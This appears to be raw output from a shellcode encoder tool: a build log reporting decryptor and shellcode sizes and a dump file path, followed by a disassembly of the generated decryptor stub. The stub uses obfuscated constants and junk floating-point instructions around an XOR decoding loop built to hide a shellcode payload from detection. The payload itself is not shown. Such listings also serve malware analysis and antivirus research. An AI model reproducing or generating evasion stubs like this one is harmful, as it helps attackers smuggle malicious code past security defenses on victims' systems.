[+] Decryptor body size = 108 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 457 bytes [+] Magic byte is C7 [+] Crypto steping = 1 byte(s) [+] Pass steping = 0 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 462 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401093 C7C1 3950822F MOV ECX,2F825039 00401099 F7D9 NEG ECX 0040109B 81C1 3950822F ADD ECX,2F825039 004010A1 66:C7C1 70DE MOV CX,0DE70 004010A6 66:81C1 ED22 ADD CX,22ED 004010AB C7C0 585090C3 MOV EAX,C3905058 004010B1 50 PUSH EAX 004010B2 8D0424 LEA EAX,DWORD PTR SS:[ESP] 004010B5 FFD0 CALL EAX 004010B7 C7C3 4000BC8A MOV EBX,8ABC0040 004010BD 81EB 9BFEBB8A SUB EBX,8ABBFE9B 004010C3 8BF0 MOV ESI,EAX 004010C5 D9ED FLDLN2 004010C7 DDD9 FSTP ST(1) 004010C9 FD STD 004010CA FF36 PUSH DWORD PTR DS:[ESI] 004010CC 5A POP EDX 004010CD 803E C7 CMP BYTE PTR DS:[ESI],0C7 004010D0 9B WAIT 004010D1 DBE3 FINIT 004010D3 D9D0 FNOP 004010D5 75 08 JNZ SHORT testsh.004010DF 004010D7 50 PUSH EAX 004010D8 D9F5 FPREM1 004010DA 5E POP ESI 004010DB D9FC FRNDINT 004010DD D9E5 FXAM 004010DF DBE2 FCLEX 004010E1 4B DEC EBX 004010E2 D9F0 F2XM1 004010E4 DBE2 FCLEX 004010E6 DBE2 FCLEX 004010E8 90 NOP 004010E9 311403 XOR DWORD PTR DS:[EBX+EAX],EDX 004010EC 90 NOP 004010ED 8BFF MOV EDI,EDI 004010EF F9 STC 004010F0 D9FD FSCALE 004010F2 49 DEC ECX 004010F3 DEC1 FADDP ST(1),ST 004010F5 D9F4 FXTRACT 004010F7 D8D9 FCOMP ST(1) 004010F9 09C9 OR ECX,ECX 004010FB D9F6 FDECSTP 004010FD ^7F CB JG SHORT testsh.004010CA